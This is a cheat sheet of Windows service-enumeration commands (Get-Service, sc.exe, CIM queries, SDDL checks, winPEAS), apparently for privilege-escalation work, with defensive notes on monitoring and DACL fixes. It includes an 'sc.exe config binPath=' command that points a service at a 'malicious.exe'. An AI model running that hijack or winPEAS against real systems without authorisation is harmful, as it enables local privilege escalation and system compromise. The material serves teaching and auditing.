Services Enum

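# List every service: the PowerShell cmdlet first, then the native service-control tool.
Get-Service
sc.exe query

# Display name, status, short name and the Can* capability flags
# (CanStop, CanPauseAndContinue, CanShutdown).
Get-Service | Select-Object DisplayName,Status,ServiceName,Can*

# Running services together with the binary each one launches (PathName).
Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.State -eq 'Running' } |
    Select-Object Name,State,PathName

# Check installed applications and their services against known CVEs.

# Service control. ServiceName is a placeholder for the service's short name.
sc.exe stop ServiceName
sc.exe start ServiceName
sc.exe qc ServiceName   # configuration of the service (binary path, start type, logon account)

# Change the service binary path (the path below is this page's example value).
# This succeeds only when the caller holds change-config rights on the service.
# The new value lands in ImagePath under HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>,
# so that registry value is the one to monitor for tampering and to restore during remediation.
sc.exe config ServiceName binPath="C:\Users\Quickemu\Downloads\malicious.exe"

# Get the permissions set on a specific service.
# A DACL that grants write or change-config rights to non-administrative principals is the
# misconfiguration that makes the binPath change above possible; the fix is to tighten the DACL.
sc.exe sdshow ServiceName   # prints the security descriptor as SDDL
# NOTE(review): ConvertFrom-SddlString has no service-specific rights type, so check the
# translated right names against the raw SDDL before relying on them.
ConvertFrom-SddlString -Sddl "<SDDL>"

# Processes and running services whose binary lives outside the Windows system directories.
# wmic is deprecated and may be absent on newer Windows builds; Win32_Process queried through
# Get-CimInstance exposes the same ExecutablePath property.
wmic process list full | select-string 'executablepath=C:' | select-string -notmatch 'system32|syswow'
# Filter on the PathName property directly so the pipeline keeps returning objects
# rather than Select-String match records built from their string form.
Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.State -eq 'Running' -and $_.PathName -notmatch 'system32|syswow' } |
    Select-Object Name,State,PathName

# Automated enumeration with winPEAS (third-party binary, services checks only, banner suppressed).
# Endpoint protection commonly flags this tool, so its execution is itself a useful detection signal.
.\winPEAS.exe quiet servicesinfo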
